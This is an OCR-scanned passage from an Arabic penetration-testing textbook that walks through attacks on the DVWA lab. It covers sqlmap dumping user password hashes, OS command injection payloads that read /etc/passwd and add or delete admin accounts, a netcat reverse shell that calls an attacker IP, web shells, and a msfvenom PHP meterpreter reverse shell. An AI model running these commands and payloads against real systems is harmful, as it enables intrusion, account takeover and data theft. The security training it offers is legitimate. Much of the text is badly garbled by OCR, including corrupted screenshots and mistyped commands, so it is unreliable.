Surname: smithy 

5f 4dcc3b5aa765d61d8327deb882cf 99 


اختبار اختراق سيرفرات وتطبيقات الويب 


طبعاً کلمات السر لن تظهر کنص صریح. سوف تكون على شکل ۸ءھم 
ومن السهل جداً كسر هذا النوع من الهاش وهو بالتحديد من نوع ۷05 
hash‏ لأنه عبارة عن 32 رقم سته عشري 9-0 and A-۴‏ 

لمعرفة نوع الهاش يمكنك استخدام أداة 0١-۸ئة۳۸‏ وهي تساعد على 
معرفة نوع الهاش الذي يكون أكبر من 50 حرف أو رقم وهذه الأداة 
موجودة بشکل تلقائي بنظام كالي. 


پمکننا أن نستخدم أداة مثل the Ripper )J†۸(‏ ohnل‏ او للاختصار فhã‏ 
hnەل‏ لکسر الهاش والحصول على کلمة بشکل نص صریح. 

استخدام هذه الأداة سهل جداً, فقط نحتاج إلى نسخ ولصق الأسماء 
وكلمات السر إلى ملف نصى وتقديمه للأداة ثم انتظار اظهار النص 
الصريح لكلمة السر لكل مستخدم. 


:sqlimap 

هي أداة لحقن تعليمات اه5۵, موجودة بشكل تلقائي في نظام كالي 
لينكسء وهي تقوم بشكل تلقائي باكتشاف واستغلال تغرات حقن 
SQ injection‏ وتملك محرك بحث خارجي وألاف الخيارات التي تمنح 
المهاجم مجال أكبر لتنفيذ الهجوم ضد تطبيقات الويب. 


اختبار اختراق سيرفرات وتطبيقات الويب 


مmaاوء‏ تستخدم ءوها؟ سوف آقوم بشرح بعض هذه الإشارات وهي: 


١‏ ا - :تستخدم لتحديد عنوان 0R)‏ الهدف للصفحة المصابة بالتغرة. 

cookie "‏ --: تستخدم لتحديد الكوكيز الخاصة بالجلسة للوصول إلى 
التطبيق أثناء عملية الهجوم. 

b ١‏ - :لعرض ١۴٥”ہوط‏ الخاص بقاعدة البيانات. 

db-rentاcur--‏ : لعرض نظام إدارة قاعدة البيانات لقاعدة البيانات 
الحالية. 

" user-rentاrاcu--‏ : العرض نظام إدارة قاعدة البيانات للمستخدم 
الحالي. 

وnاtء--‏ : لتأمين قيمة نصية لتعريف الايجابيات الخاطئة. 

" كsامus--‏ : لعرض مستخدمي نظام إدارة قاعدة البيانات . 

" swodءوم--‏ :لعرض الهاش الخاص بكلمة سر إدارة قاعدة البيانات. 

١‏ ل۷ - : لتحديد مستخدم إدارة قاعدة البيانات لتضمينه بالهجوم. 

" egesاviاام--‏ : لعرض صلاحيات المستخدم. 

* كطه-- : لعرض أسماء كل قواعد البيانات الموجودة في سيرفر 
قاعدة البيانات. 

١‏ 0-: لتحديد أي قاعدة بيانات كهدف. 

" كعاطها-- : لعرض كل الجداول في قاعدة البيانات الهدف. 

١‏ آ- : لتحديد الجدول الهدف. 


اختبار اختراق سيرفرات وتطبيقات الويب 


" umnsاoء--‏ : لعرض كل الأعمدة في الجدول الهدف. 

:-٥ ١‏ لتحدید أي عامود ليتم عرضه. 

" مumل--‏ :لعرض محتوى الأعمدة الهدف. 
قيمة البرامتران الذين نحتاج لإضافتهما باستخدام هذه الإشارات هما 
لتحديد عنوان ا8ل للصفحة المصابة وفعرف الجلسة (cookie)‏ 
بەکننا بسهولة عرض هذه القيم من Burp Intercept aأ raw tab‏ 
عنوان ا۴ل هو نفسه لكل مستخدم, أما فعرف الجلسة الذى 
سنستخدمه سوف يختلف عن قيمة المعرف في هذا المثال, لذلك تأكد 
من كل قيمة وتأكد من أن البروكسي لديك فعد ليلتقط الطابات. 
بعد أن تقوم بإدخال أي قيمة (2 في مثالنا) كفعرف للمستخدم ٣مول‏ 
0 فإن القيم المطلوبة التي نحتاجها لتشغيل مة٣ا۹ء‏ سوف تعرض 
في طها سه٣‏ كما في الشكل التالي 


اختبار اختراق سيرفرات وتطبيقات الويب 


(Intercept | HTTP history [Websockets history | options | history 


Filter: Hiding CSS, image and general binary content 


# 4| Host | Method | URL | Params | Edited | Status | Lengl 


1 http://127.0.0.1 POST f/dvwa/login.php 3 0 302 364 

2 http://127.0.0.1 GET /dvwaf/index. php O0 O 200 7726 
3 http://127.0.0.1 GET /dvwa/vulnerabilitie s/s qli/ Û 8 200 5547 
5 http://127.0.0.1 GET /dvwa/vulnerabilities/sqli/?id=Ja... 3 O 200 5547 
6 http://127.0.0.1 GET /dvwa/security. php 8 0O 200 6330 
7 http://127.0.0.1 GET /dvwa/security. php ت‎ . 200 6330 
8 http://127.0.0.1 POST /dvwa/security. php 2 8 302 457 

9 http://127.0.0.1 GET /dvwa/security. php 2 اک‎ 200 6399 
10 http://127.0.0.1 GET /dvwa/vulnerabilitie s/s qli/ 8 ك‎ 200 5441 
11 http://127.0.0.1 GET /dvwaf/vulnerabilities/sqli/ O O 200 5441 
12 http://127.0.0.1 GET /dvwa/vulnerabilities/sqli/?id=Ja... 3 O 200 5813 
19 http://127.0.0.1 GET /dvwa/vulnerabilities/sqli/?id=Ja... 2 8 200 5813 

htn-//127 N N 1 CFT Iehauahaılnarahilitiacleali/7idl—la an ھ‎ 


Ran | Params | Headers | tex 


GET /dvwa/vulnerabilities/sqli/ HTTP/1.1 

Host: 127.0.0.1 

User-Agent: Mozilla/5.O0 (Xll; Linux x86_64; rv:38.0) Geckto/20100101 Firefox/38.0 Iceweasel/38.5.0 
Accept: text/html,application/xhtmltxml,application/xml 7; q=0.9,*/*;q=0.8 

Accept-Language: en-US,en;q=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http: //127.0.0.1/dvwa/index . php 

Cookie: security=impossible; PHPSESSID=3nmtO fuSnpp g20upb Sp 8nk o leO0 

Connection: keep-alive 


cookie header (PHPSESSID and security) یوجد بارامترین فضي‎ 

ونحن بحاجة لاستخدامها فى مة"اهء ونحن بحاجة أيضاً لحصد ا0 من 
Referrer header‏ 

للتأكد من أنك لم تفقد أثر هذه القيم قم بفتح ملف نصي وقم بنسخ 


ولصق هذه القیم, سوف نستخدم تقيoئة cookie دeڊ cookie‏ -- 


وقيمة URL‏ بعد uںu-‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


قم بإدخال أي رقم في حقل ١0١‏ ١هءلا‏ في صفحة ۸٥ذامزم¡‏ ا8۵ في 
dvwa‏ 


ثم قم بفتح هذا الطلب في مااںS Burp‏ من القائمة ر×ہ٣۴‏ ثم القائمة 
الفرعية رءهاءİ١‏ قم بالضفط بالزر اليميني فى القسم السفلي من 
الشاشة واختر النسخ إلى ملف كما في الشكل التالي 


| rite dng C53, image and general binary content 0 
© “mont Method URL Params COROG Stabs Lang | MIE tipe EMention | Te 
i ei? 982 POT  (veaiegn she 4 Û 2 HI o ۳ 
2 hes Ji2? 001 off NOvma/lnden ehe ٠ û 0د‎ 724 HTL se weiteme 1 Oma vu 7 
3 Nes A27? 001 otf Ora arrainer bane 1.10 Û مو 200 ل‎ HTML Veiner ORY 
5 heg 1270.01 Ger (Om a/rineratûte 1/19/76“ a ا‎ 3 2 s57 HTML Viner ebêty 5. n 
٤ hag t27 041 arr (Ovma/necurêy phe g3 0 e <50 HT s9 DWA Securky: Da 
7 neg (27022 or Oven avec urny gh 0 U e © TDL ste DUWA Şeoky: Da 
1 eR 81 #OST  Ovaalseiurhy phe ى‎ BS 457 MA o 
١ i ITIL arr KOrmaedurty Ns oU Û جد‎ e HTML so Ova fe0ny De 
10 NS A27? 001 ofr ferm a/ralner sb 4Me 11V Û 290 اممو‎ HIM VWinerebity O. Mi 
11 es I127 001 off a ەو 29د ل‎ HTML Vinerebdety SX | 
12 Es 127001 ortT fOrea/eainer abûbe 1v NG“ ja 5 20 s12 HTML Viner abut, 5 ny 
1 hey A27021 Gtr (Orn a/eainer atûte w/v = ja 8 مد‎ s12 HTML Viner abdty SU n 
1 e n2 qer AA nu san Marah Anas le A DNA nla موعن م م‎ 
٠ 1e4 to Toute’ ۰ 
| Reeves: | dntyance . 
rge 
Serd to miruder culet 
ا قاتا سا‎ Serd to Bere nler con loo 
CET /Orwa/vulnetabilit100/ 0q 21/ RSD LL Sed to Sequencer 


27.0.0.1 
Ago OIL. © IL; bimos 0_0 e 0.01 Ceo OLoOLoL raced 
pti Cok DARI, Qplioanion/aniinnl, applica ion/inl g0 5,700.8 


Sed to Comparer 
Sed to Detoder 


Acoept"lanpgusge onrVl,_eonq*O 4 Shoe resporne in bronmner 
Antep -Inavaing goip,. etiate equa brane ۰ 
1/Orwa/indoa piv آ‎ 
Pr 1 
1 PUPEESSID= Denar O NuSngy NEA pank + 30 | Sgeperert oe Pre versin < 
Copy ا‎ 


Copy 04 Ci command 


Love 10m 


ثم قم بحفظ هذا الطلب بأي اسم وأي مسار تختاره 


اختبار اختراق سيرفرات وتطبيقات الويب 


أنا اخترت اسم اهء كما في الشكل التالي: 


۳ 


e kali [Running] - Oracle VM VirtualBox 


F_ Burp Intruder Repeater Window Help 
1 Target fierexy Spider [ Scanner Î Intruder | Repeater | Sequencer | Decoder [ Comparer [ Options [ Alerts 


1 Intercept [IHistory [ Options | 


| iter Hiding CSS, imagand general binary content 


# 4| Host Method | URL Params | Modifi... | Status | Length | MIME type | Extension | Title 4 
3 http://safebrowsing. clients POST sameinaldaunla ade clan CR 
Choose a file to save to 
Look In: |) root ل‎ a @ ھ‎ E ھ‎ 
î Desktop 
John 
DVWA-1.0.8.zIp 
[ÎS duwa html 
Nessus-S 2 6-debian6_amd64 deb 
ا«‎ 5 any > 
_femginal request | auto-modified reque! 
Raw | Params | Headers | Hex File Name sa 
GET /dvwa/vulnerabilities/sql/?id= 126 Files of Type: [All Files 0 5 
Host: 127.0.0.1 
User-Agent: Mozilla/5.0 (X11: Linux xf 
Accept: text/html,application/xhtml +54 Save | | Cancel 
Language: en-US,en;:q=0.5 
Accep' coding: gzip, deflate 
Referer: httpJ/127.0.0.1/dvwa/vulnerabilities/sqlif?id= 1&Submit= Submit 
Cookie: security= low: PHPSESSID=jr7itr2566f2amhh57pck2vra650 
Connection: keep-alive 
۲ 


O0 matches 


نقوم بتشغیل أداة "ا۹ء باستخدام الأمر التالي: 


sqlmap -r /root/sql --banner 


اختبار اختراق سيرفرات وتطبيقات الويب 


وستكون النتيجة كالتالي: 


sqlmap -r /root/sql --banner 


} 


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua 
consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respor 
sible for any misuse or damage caused by this program 


[*] starting at 06:39:59 


do you want to try URI injections in the target URL itself? [Y/n/q] 


وهي تحديد نوع نظام التشغيل الخاص بسيرفر الويب بالإضافة إلى 


تحديد نوع سيرفر الويب ونوع قاعدة البيانات المستخدمة. 


للحصول على قواعد البيانات الموجودة على الموقع نستخدم الأمر 
التالي: 


sqlmap -r /root/sql --dbs 


وتكون النتيجة كالتالي: 


اختبار اختراق سيرفرات وتطبيقات الويب 


web server operating systen: 
web application technology: Apache 2.4.10 
back -end DBMS: MySQL == 5.0.0 


available databases [4] : 
dvwa 
] information_schema 
mysql 
performance_schema 


كما يظهر فإنه يوجد اربع قواعد بيانات على هذا الموقع. 
للحصول على الجداول داخل أي قاعدة بيانات من خلال الأمر التالى 
من أجل قاعدة البيانات aسvwل‏ مثا 


sqlmap -r /root/sql -D dvwa --tables 


وتكون النتيجة كالتالي: 


web server operating system: Linux Debian 
web application technology: Apache 2.4.10 
back-end DBMS: MySQL 5 


Database: dvwa 
[2 tables] 


اختبار اختراق سيرفرات وتطبيقات الويب 


قاعدة البيانات س۷ل تحوي على جدولين 


للحصول على محتويات الجدول ك٣هوں‏ نستخدم الأمر التالى 

sqlmap -r /root/sql -D dvwa -T users --dump 
عند تطبيق هذا الأمر سوف يسألك إذا كنت تريد حفط الهاشات الخاصة‎ 
بكلمات السر الموجود في الجدول في ملف مؤقت ثم يسأل إذا كنت‎ 
تريد كسر هذه الهاشات قم بالإجابة بالحرف ل وستكون النتيجة كالتالي:‎ 


0. +--+ 
user_id | avatar user EEE ege 
| last_name | first_name | lLast_login | failed_login | 
. e e r e he C 


127.0.0.1/dvuwa/hackable/users/admin . j pg | admin 5f4dcc3b5aa765d61df 

| admin | admin | 2016-01-04 01:14:10 | 0 | 
127.0.0.1/dvwa/hackable/users/gordonb.jpg | gordonb e99a18c428cb38d5 f2 

| Brown | Gordon | 2016-01-04 01:14:10 | 0 | 
127.0.0.1/dvwa/hackable/users/1337.jpg | AEE Sd3533d75ae2c 3966d 

iE | Hack | 2016-01-04 01:14:10 | 0 | 
://127.0.0.1/dvwa/hackable/users/pablo . jpg | pablo Qd107d09f5bbe40c adg 

MAKe-EEle) | Pablo | 2016-01-04 01:14:10 | 0 | 
127.0.0.1/dvuwa/hackable/users/smithy.jpg | smithy 5f4dcc3b5aa765d61d 

882c f99 (password) | Smith | Bob | 2016-01-04 01:14:10 | 0 | 


النتيجة تحوي على اسم كل مستخدم مع هاش كلمة السر الخاصة به 
بالإاضافة إلى كلمة السر ورابط يعرض الصورة الخاصة بهذا المستخدم. 


اختبار اختراق سيرفرات وتطبيقات الويب 


ثغرة حقن تعليمات نظام التشغيل: 


جزء أخر من هجوم الحقن هو حقن تعليمات نظام التشغيل, هذا يحدث 
عندما يكون المهاجم قادرا أن يملي أوامره على سيرفر الويب من خلال 
(bash in Linux or cmd.exe in Windows)‏ 

في معظم الحالات فإن المهاجم يكون قادر على إضافة تعليمات نظام 
خبيثة إلى التعليمات التي يؤمنها تطبيق الويب, مثلاً إذا كان تطبيق 
الويب يسمح للمستخدم معرفة عنوان ١۴‏ الخاص به أو معرفة اسم 
الدومين وذلك من خلال تمرير بارامتر تحت تحكمه. 

المهاجم سيقوم بإضافة تعليمة أخرى مثل تعليمة إضافة مستخدم 
جديد للنظام وإذا كان التطبيق مصاب بهذه التغرة فسوف يتم تنفيذ 
كلتا التعليمتين. 


. IC o il انت نظام‎ 1l 1 حقن‎ 


عندما يقوم مختبر الاختراق باكتشاف ثغرة حقن تعليمات نظام التشغيل 
فهناك عدد من التعليمات التي غالباً ما سيقوم بتنفيذها وهي: 


2 و 
* إضافة مستخدم إلى مجموعة عمل (مجموعة الإدارة) 


١‏ حذف مستخدم (حذف مدير النظام) 


اختبار اختراق سيرفرات وتطبيقات الويب 


بالإضافة إلى بعض التعليمات الأخرى التي تساعد على الحصول على 
أكبر قدر ممكن من المعلومات عن النظام مثل معلومات المستخدمين 
ومعلومات ملفات المستخدمين ومعلومات إعدادات النظام. 

الأمر المهم الذي يجب أن تدركه أنك تقوم بتنفيذ التعليمات في 
مستوى صلاحيات محدد. إذا كان تطبيق الويب يعمل بصلاحية أمهء في 
نظام لینکس او ۴٥اھ٣dministه‏ في نظام ويندوز فإن التعليمات التي 
تقوم بحقنها سوف يتم تنفيذها في أعلى مستوى ولكن هذه الحالة 
نادراً ما تحدث لأن معظم تطبيقات الويب تعمل في مستوى صلاحيات 
منخفض مثل المستوى لذلك يجب عليك أنت تستخدم هذا الهجوم 
لتحميل الكود المصدري وتكتشف الملفات الحساسة الموجودة على 


سيرفر الويب. 


في نظام التشغيل لينكس يمكنك استخدام التعليمة التالية: 


:~# useradd j ameel 


لاضافة مستخدم جدید اسم ا٥٭٥مصھز‏ 


ثم ا کزا نت .ه ° م ال 1 .. التالية 


:~# passwd jameel 
Enter new UNIX password: 


Retype new UNIX password: 
passwd: password updated successfully 


لتعين كلمة سر لهذا المستخدم. 
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عندما يصبح لديك مستخدم في سيرفر الويب يجب عليك معرفة ماهي 
المجموعات الموجودة ويتم ذلك من خلال التعليمة التالية 


:~# getent group j ameel 


j ameel :x:1004: 


بإفتراض آنه يوجد مهو مهه فيمكنك إضافة المستخدم الذي قمت 
بإضافته الى هذه المجموعة من خلال التعليمة التالية 


usermod -G admin jameel 
عندما يصبح لديك حساب داخل مجموعة الادارة يمكنك أن ترى كل‎ 
admin و٣هuم المستخدمين الأخريين الموجودين في مجموعة الإدارة‎ 
باستخدام التعليمة التالية:‎ 
getent group admin 
يمكنك بعدها حذف أي حساب لمستخدم أخر ( اممصهز مثلً) باستخدام‎ 
التعليمة التالية‎ 


:~# userdel j ameel 


يمكنك كتابة سلسلة من التعليمات لاضافة مستخدم جديد وحذف كل 
حسابات المستخدمين الأخريين في سيرفر الويب 
في نظام ويندوز يمكنك استخدام التعليمة التالية 


net user /add jameel 12456789 
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لإضافة مستخدم جديد بإسم اممmهز‏ وكلمة سر 123456789 
يمكنك بعدها إضافة هذا المستخدم |l”ى administrator group‏ 
باستخدام التعليمة التالية 

net localgroup administrators jameel /add 
ويمكنك حذف مستخدمين أخريين (اA مثلاً) باستخدام التعليمة التالية:‎ 


net user Ali /delet 


في حال أنك لم تكن تعمل في أعلى مستوى صلاحيات 

(root in Linux or SESTEM in Windows) 
لمعرفة مستوى الصلاحيات الخاص بك‎ ١ يمكنك استخدام تعليمات مثل‎ 
أو يمكنك مشاهدة ملف لسءعدم من خلال التعليمة التالية‎ 


:~# cat /etc/passwd 


هجوم حقن تعليمات نظام التشغيل: 


يوجد في 0۷W۸‏ على الجانب الأیسر خlıر Command Execution ga‏ 


وهو الذي يسمح لنا باختبار هجوم حقن تعليمات النظام 
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DUWA) 


TEE Vulnerability: Command Injection 
Eons Ping a device 
Setup / Reset DB 


Enter an IP address: | | Submit | 


Brute Force 


Command Injection 


CSRF 


File Inclusion 


More Information 


e http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution 
e http://www.ss64.com/bash/ 
File Upload e http:/Mwww.ss64.com/nt/ 


e https://www.owasp.org/index.php/Command_iInjection 
Insecure CAPTCHA 


SQL Injection 


التعلمية التي يمكن تنفيذها ضمن تطبيق الويب هذا هي ومام 


دخل المستخدم يتم تمريره إلى النظام ليقوم بتنفيذ تعليمة و٣م‏ ثم 
يتم إعادة نتيجة تنفيذ هذه التعليمة ليتم عرضها على متصفح 


المستخدم كما في الشكل التالي: 


Vulnerability: Command Injection 


Ping a device 


Enter an IP address: | | | Submit 

PING 127.0.0.1 (127 
64 bytes from 127.0 
64 bytes from .0 
64 bytes from .0 
64 bytes from .0 


.0.0.1) 56(84) bytes of data. 

.0.1: icmp_seq=1 ttl=64 time=0.034 ms 
.0.1: icmp_seq=2 ttl=64 time=0.043 ms 
1: 

E: 


1icmp_seq=3 ttl=64 time=0.046 ms 
1cmp_seq=4 ttl=64 time=0.044 ms 


--- 127.0.0.1 ping statistics --- [ 
4 packets transmitted, 4 received, O% packet loss, time 2998ms 
TEE min/avg/max /mdev = 0.034/0.041/0. 046/0. 009 ms 
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الإجابات لتعليمة ومام من الجهاز المحلي ائهطاةعها تظهر نجاح تنفيذ 
العملية. 


كمختبر اختراق تحتاج إلى أن تقدم تعليمات نظام لينكس إضافية بعد 
استخدام فاصلة منقوطة. 
بدلاً من كتابة عنوان 127.0.0.1 ١۴‏ يمكنك أيضاً كتابة تعليمات نظام 
إضافية كما في المثال التالي وذلك لإظهار قائمة بالمجلدات الموجودة 
وذلك من خلال كتابة الأمر التالي 

127.0.0.1; ls 


Vulnerability: Command Injection 


Ping a device 
Enter an IP address: | | Submit 


PING 127.0.0.1 (12 


.1) 56(84) bytes of data. 
64 bytes from 127. 


: icmp_seq=1 ttl=64 time=0.033 ms 


64 bytes from 127. 


: 1cmp_seq=3 ttl=64 tıme=0.048 ms 
64 bytes from 127. 


: icmp_seq=4 ttl=64 time=0.048 ms 


FE 
8B: 
64 bytes from 127.0. : 1cmp_seq=2 ttl=64 time=0.047 ms 
8 
B8: 


- 127.0.0.1 ping statistics --- 
4 packets transmitted, 4 received, O% packet loss, time 2999ms 
FEE min/avg/max/mdev = = 0.033/0.044/0. 048/0. 006 ms 
hel 
index.php 
source 


سوف تظهر نتيجة التعليمة كا مباشراً بعد نتيجة تنفيذ التعليمة ومام 
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يمكنك عرض ملفات النظام الحساسة مثل ملف كلمات السر من خلال 


127.0.0.1; cat /etc/passwd 


Vulnerability: Command Injection 


Ping a device 


Enter an IP address: | | | Submit 


PING 127.0.0.1 (127 
64 bytes from 127.0 
64 bytes from 127.0 
64 bytes from 127.0 
64 bytes from 127.0 


.0.0.1) 56(84) bytes of data. 

.O0.1: icmp_seq=1 ttl=64 time=0.028 ms 
.0.1: icmp_seq=2 ttl=64 time=0.044 ms 
.O0.1: icmp_seq=3 ttl=64 time=0.045 ms 
.0.1: icmp_seq=4 ttl=64 time=0.047 ms 


--- 127.0.0.1 ping statistics --- 

4 packets transmitted, 4 received, O% packet loss, time 2998ms 
rtt min/avg/max/mdev = 0.028/0.041/0.047/0.007 ms 
FOOE:X:O:0: r OOE JT ODE: USEF 
daemon:x:1:1:daemon: /usr/sbin: /usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
S¥JS:X:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534: sync: /bin: /bin/sync 

games:x:5: 60: games: /usr /games: /usr/sbin/nologin 

man:x:6: 12:man: /var/cache/man: /usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mai l:/usr/sbin/nologın 

news:x:9:9:news: /var/spool/news: /usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp: /usr/sbin/nologin 
proxy:x:13:13:proxy:/bin: /usr/sbin/nologin 

www- data:x: 33: 33:www- data: /var /www: /usr/sbin/nologin 
backup:x:34: 34: backup : /var /backups: /usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 


يمكنك الآن استخدام هذه الثفرة لتنفيذ التعليمات التي ذكرنها سابقاً 
لإضافة وتعديل وحذف المستخدمين من النظام, كما يمكن استفلال 
هذه التغرة لعرض محتوى ملف لسءءهم الذي يحوي على كلمات السر 
لكل المستخدمين وكذلك لعرض كود التطبيق للبحث عن ثغرات إضافة 
في التطبيق. 
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ويمكن الاستفادة من هذه التغرة في الحالة التي یکون فیها تطبیق 
الويب مبنى فيه تنفيذ تعليمة لإرسال ايميل بدلا من استخدام مكتبة 
SMTP‏ 


هذه الثفرات تظهر عندما يمرر عنوان ايميل غير منقح إلى سطر الأوامر 
في تطبيق ارسال الايميلات لبناء التعليمة. 

Mail -s "Account Confirmation? dolphin-syria@hotmail. com 
كما يمكنك إضافة تعليمات لينكس إضافية لإضافة عنوان إيميل إلى‎ 
دخل مستخدم ذو صلاحيات عالية لیتم معالجته مباشراً من قبل نظام‎ 
گیا‎ 55 1| 
هي استخدام ااماء تفاعلية.‎ 
يوجد عدة طرق للقيام بهذه العملية من خلالها ولكن الطريقة الأكثر‎ 
شیوعاً ھی باستخدام أُداة ٤٥٥ہ علی کل من جھازك کمستمع وعلی‎ 
جهاز الهدق ك ااماء و التي سوف تتصل بشكل عكسي مع جهازك.‎ 
يمكنك إعداد جهازك كمستمع من خلال تنفيذ التعليمة التالية‎ 


nce -| -v yourIPAddress -p 4444 


:~# nc -l -v 127.0.0.1 -p 4444 
listening on [any] 4444 ... 
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وعلى جهاز الهدف من خلال حقن التعليمة التالية 


nc -c /bin/sh YourIPAddress 4444 


سیل الویب ااeطs :web‏ 


هو سكريبت صغير يمكن رفعه إلى سيرفر الويب من خلال موقع مصاب 
بهذه الثغرة وهو يؤمن لمختبر الاختراق وصول لسيرفر الويب ويسمح له 
بتنفيذ التعليمات من عن بعد. 


يجب أن يكون السكريبت مكتوب بلغة يدعمها سیرفر الویب ( ٣ہ‏ مام 
(asp‏ 


إذا كان السیرفر الهدف يدعم ۴۳۲۴ فيجب استخدام سكريبت مكتوبة 
بهذه الاغة. 


الشيل تسمح لمختبر الاختراق القيام ومن عند بالأمور التالية: 
التنقل بين المجلدات. 
١‏ تعديل الملفات. 
د تحميل أو رفع ملفات. 
١‏ حذف الملفات. 


٠‏ تنفيذ تعليمات في نظام التشفيل. 
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١‏ الاتصال بقاعدة البيانات. 
= کل معلومات عن بنية الشبكة. 


تفن رفع هذه الشیيل في المواقع المصابة بتغرة 
RFI - Remote File Inclusion‏ 


يوجد العديد من الشيل والتي تؤمن لك واجهة للتحكم بالسيرفر الهدف 
China Chopper, WSO, C99 and B374K :Jio‏ 


کما یمکننا استخدام ۳ ٥۷۵۸یہ‏ لتولید شیل مطم تسمح لنا بفتح جلسة 
اتصال عكسي مع السيرفر الهدف 


:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.2.100 LPORY=4444 -e php/baseb4 
-f raw >shell .php 
No platform was selected, choosing Msf : :Module::Plat form: :PHP from the payload 
No Arch selected, selecting Arch: php from the payload 
Found 1 compatible encoders 


Attempting to encode payload with 1 iterations of php/base64 
php/base64 succeeded with size 1287 (iteration=0) 

php/base64 chosen with final size 1287 

Payload size: 1287 bytes 


الآن يمكننا رفع هذا الملف إلى سيرفر الويب (إذا كان السيرفر مصاب 
بهذه التغرة) 
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وفتح اداة الميتاسبلويت وإعداد ۴مالك٣ةط‏ ليستقبل الاتصال العكسي 


( J) > set payload php/meterpreter/reverse tcp 
d => php/meterpreter/reverse tcp 
J) > set lhost 172.16.2.100 


lhost => 172.16.2.100 
msf exploit ( J) > exploit 


[*] Started reverse TCP handler on 172.16.2.100:4444 
] Starting the payload handler... 


ثم نقوم بفتح الرابط الذي يحوي على مسار الشيل وعندها سوف تبداً 
عملية الاتصال العكسي وسنحصل eښJlJ”‏ جulة go ûülleû meterpreter‏ 
النظام الهدف. 
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محتوى هذا الفصل: 

« تغرات المصادقة وإدرة الجلسة. 

١‏ هجوم القوة الغاشمة ءء٣ه؟‏ مutاb‏ لكسر المصادقة. 
١‏ مهاجمة الجلسة (الكوكيز ). 


٠‏ هجوم تجاوز المسار. 


No security hole is small 


اختبار اختراق سيرفرات وتطبيقات الويب 


مقدمة: 

عملية المصادقة تسمح لنا بتسجيل الدخول إلى تطبيق الويب بينما إدارة 
الجلسة تتبع الطلبات والإجابات التي تتم خلال عملية التصفح وبذلك 
نستطيع القيام بأكثر من عملية كدفع الفواتير والتسوق عبر الانترنت 
وتصفد المواقع. 

عملية المصادقة n٥ااauthentica‏ وعملية إدارة الجلسة لم تؤخذان بعين 
الاعتبار عندما تم إیجاد بروتوکول 1۲۳۴ , لسوء الحظ فإن المصادقة 
وإدارة الجلسة تحوي على ثغرات كثيرة في العديد من تطبيقات الويب. 
هجوم تجاوز المسار يحدث عندما يكون مسموح للمهاجم التنقل بين 
المجلدات في سيرفر الويب. 

وهذا شائع جداً عندما يسمح تطبيق الويب بعملية رفع الملفات كةهامں 
تطبيق الويب ويسمح بالوصول إلى الملفات والمجلدات الحساسة في 


سيرفر الويب. 
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سوف نتعرف على المجلدات التي يتم مهاجمتها في كل من نظام 
التشغيل ويندوز ونظام التشغيل لينكس وكيف تتم عملية الهجوم. 


ثغرات المصادقة وإدارة الجلسة: 


هجوم المصادقة الأكثر شيوعاً يتم باستخدام أدوات البروكسي مثل أداة 
)Burp Suite's !ntruder)‏ التي تستخدم هجوم القوة |lلغlښۉشoةã brute‏ 
مcادf‏ التخمين على معلومات تسجيل الدخول 


لا يوجد الكثير من السرية في هذا النوع من الهجوم ولكنه ناجح جداً 
لأن معظم المستخدمين مازالوا يستخدمون كلمات سر ضعيفة. 

سوف نقوم باستخدام ntruderا Burp‏ مع قائمة تحوي علی عدد کبیر 
من كلمات السر. 

هناك العديد من الجوانب في المصادقة خلال تطبيق الويب والتي لها 
أهمية في هذا النوع من الهجوم مثل: 

تسجيل الدخول إلى التطبيق. 

« تغيير كلمة المرور. 

د الأسئلة السرية. 


١‏ اسم المستخدم المتوقع. 
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٠‏ كلمة السر الأولية المتوقعة. 
٠‏ كلمات السر التي لا تنتهي صلاحياتها أبداً. 
خلال هذا الفصل مصطلح الكوكيز ءi)مممء‏ سوف يستخدم للإشارة إلى 


الكوكيز الخاصة بالجلسة session cookie‏ أو معرف llجlلںسã session‏ 


identifier 


مهاجمة إدارة الجلسة يمكن فقط من خلال إحدى الطريقتين: 

.١‏ مهاجمة آلية توليد معرف الجلسة. 

. مهاجمة آلية استخدام الكوكيز وآلية تسليمها من قبل تطبيق 

الويب. 

مهاجمة آلية توليد الكوكيز صعب جداً لأن آلية توليد إدارة الجلسة تكون 
متضمنة داخل سيرفر الويب الذي يقوم بخلق الكوكيز والتي من الصعب 
حداً تخمينها. 
الهجوم الأكثر شيوعاً على التطبيق يتم من خلال فحص كيفية استخدام 
الكوكيز من قبل التطبيق وهذا النوع من الهجوم لا يتطلب منك فهم 


عملية توليد الكوكيز بل يركز على الوصول إلى الكوكيز وطريقة 
استخدامها. 


مختبر الاختراق يقوم بسرقة الكوكيز وإعادة استخدامها 
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تغرات تجاوز المسار: 


عندما يتم تنصيب سيرفر الويب وإعداده فإن تطبيق الويب يأخذ مساحة 
من سيرفر الويب و يسمح للتطبيق العمل داخلها, هذه المساحة تحوي 
على الكود الخاص بالتطبيق والصور والملفات وقواعد البيانات الخاصة 
التطبيق لا يجب عليه أبداً أن يحاول الوصول إلى مصادر خارج المساحة 
المخصصة له لأن هذه المصادر الأخرى الموجودة على سيرفر الويب 
ستكون مخصصة لتطبيقات أخرىء 

إذا استطاع مختبر الاخراق الوصول إلى خارج حدود المساحة المخصصة 
للتطبيق والوصول إلى المصادر الأخرى على سيرفر الويب فهذا يسمى 


هجوم تجاوز المسار. 


هجوم القوة الغاشمة لكسر المصادقة: 
المصادقة تأخذ مكانها في عدة أجزاء من تطبيق الويب غير صفحة 


الدخول الرئيسية وهي موجودة أيضاً عندما يقوم المستخدم بتغيير 
كلمة السر أو تحديث معلومات الحساب الخاص به وتتم عملية المصادقة 
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أيضاً خلال عملية استعادة كلمة المرور وخلال الإجابة على الأسئاة 
السرية وعند استخدام خيار تذكرني remember me‏ 

إذا تم إيجاد أي خلل في عملية المصادقة خلال العمليات السابقة 
فسوف يتم الوصول إلى عملية المصادقة بشكل الكامل. 

الشيء المخيف في ثغرات المصادقة بأنه يمكن أن تفتح باب ليتم 
الوصول من خلاله لكل حسابات المستخدمين, تخيل المصيبة التي سوف 
